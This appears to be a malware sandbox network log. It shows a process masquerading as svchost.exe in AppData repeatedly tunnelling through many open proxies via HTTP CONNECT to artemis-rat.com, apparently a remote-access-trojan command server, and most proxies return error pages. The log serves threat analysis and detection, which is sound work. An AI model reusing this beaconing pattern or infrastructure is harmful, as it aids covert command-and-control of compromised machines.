Mar 9, 2024 13:14:28.429131985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1998	192.168.2.5	56263	172.67.200.220	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.431463003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.586078882 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1999	192.168.2.5	56078	101.255.208.170	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.431729078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2000	192.168.2.5	56272	104.17.66.69	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.438024998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.592559099 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2001	192.168.2.5	56103	110.12.211.140	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.439544916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2002	192.168.2.5	55654	120.194.4.157	5443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.440649986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.880213976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.177145004 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.913188934 CET	319	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html Content-Length: 170 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2003	192.168.2.5	56275	104.18.237.128	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.442912102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.597249985 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2004	192.168.2.5	56274	104.21.85.200	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.442989111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.597318888 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2005	192.168.2.5	56195	162.243.102.207	9764	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.447670937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2006	192.168.2.5	56298	104.20.179.187	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.455852985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.610264063 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2007	192.168.2.5	56308	172.67.187.242	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.467760086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.622140884 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2008	192.168.2.5	56311	104.16.241.204	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.468298912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.622771025 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2009	192.168.2.5	56098	120.76.42.209	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.469324112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2010	192.168.2.5	56148	185.158.114.14	25697	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.485155106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2011	192.168.2.5	56161	95.164.89.123	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.493185997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.794482946 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2012	192.168.2.5	56247	92.204.136.149	16691	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.495279074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.138165951 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2013	192.168.2.5	56091	171.244.140.160	42456	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.520066023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.301799059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.442971945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.833800077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.442961931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2014	192.168.2.5	56532	91.231.186.133	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.521639109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2015	192.168.2.5	56533	91.231.186.133	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.522329092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2016	192.168.2.5	56535	91.231.186.133	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.523026943 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2017	192.168.2.5	56536	91.231.186.133	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.523907900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2018	192.168.2.5	56122	103.127.1.130	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.527411938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.921025991 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2019	192.168.2.5	56172	45.138.87.238	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.532752037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2020	192.168.2.5	56201	47.243.205.1	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.535113096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.845927000 CET	741	IN	HTTP/1.1 500 Internal Server Error Server: nginx/1.20.1 Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 579 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2021	192.168.2.5	56364	104.24.35.152	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
